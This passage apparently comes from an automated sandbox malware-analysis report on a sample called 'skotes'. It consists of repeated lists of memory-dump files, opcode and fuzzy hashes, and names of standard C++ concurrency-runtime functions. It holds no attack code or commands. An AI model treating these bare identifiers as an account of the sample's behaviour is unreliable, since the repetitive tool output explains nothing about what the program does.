                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 239e85b0e895f7d55105a5ef73a2d4c6a425aa285ab64f638a2c88351924049b
                                                                                                                                                                                            • Instruction ID: 427bf804fc680b4fa7ff7d8356b73a514a9a0b16a5f0ea459b7a64ef0bd5f49d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 239e85b0e895f7d55105a5ef73a2d4c6a425aa285ab64f638a2c88351924049b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 25519EB2A056068FDB15CF98D8957EEB7F2FB58304F28856AD406EB350D3B4A980CF50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0061F2BB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: pEvents
                                                                                                                                                                                            • API String ID: 2141394445-2498624650
                                                                                                                                                                                            • Opcode ID: d228fc3651cce8f0ba639efb8ba0085a16731c2469290c27eb73896c4943edc8
                                                                                                                                                                                            • Instruction ID: 07c81249ec63b8e04d641cfd94d447cdb47ebc433a620cf143ce5ed6e965543f
                                                                                                                                                                                            • Opcode Fuzzy Hash: d228fc3651cce8f0ba639efb8ba0085a16731c2469290c27eb73896c4943edc8
                                                                                                                                                                                            • Instruction Fuzzy Hash: FC817D31D00219DBCF14DFE8C981BEEB7B6AF59310F1C4569E801A7382DB75AA85CB91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006326E3
                                                                                                                                                                                              • Part of subcall function 006324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00632504
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00632704
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00632711
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0063275F
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 006327E6
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 006327F9
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00632846
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2530155754-0
                                                                                                                                                                                            • Opcode ID: 4b847f284c22201c0261fbd908d8e96fbacbc00db43400006076f17604926468
                                                                                                                                                                                            • Instruction ID: aeeea83cf04ff9147718d7dade15b93578651efe667482dccd03f00e46a1e3fe
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b847f284c22201c0261fbd908d8e96fbacbc00db43400006076f17604926468
                                                                                                                                                                                            • Instruction Fuzzy Hash: E3818E3490024AABDF169F54D9A1BFEBBB3AF45314F044098EC416B392C7368D5ADBE1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00632982
                                                                                                                                                                                              • Part of subcall function 006324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00632504
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006329A3
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006329B0
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006329FE
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00632AA6
                                                                                                                                                                                            • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00632AD8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
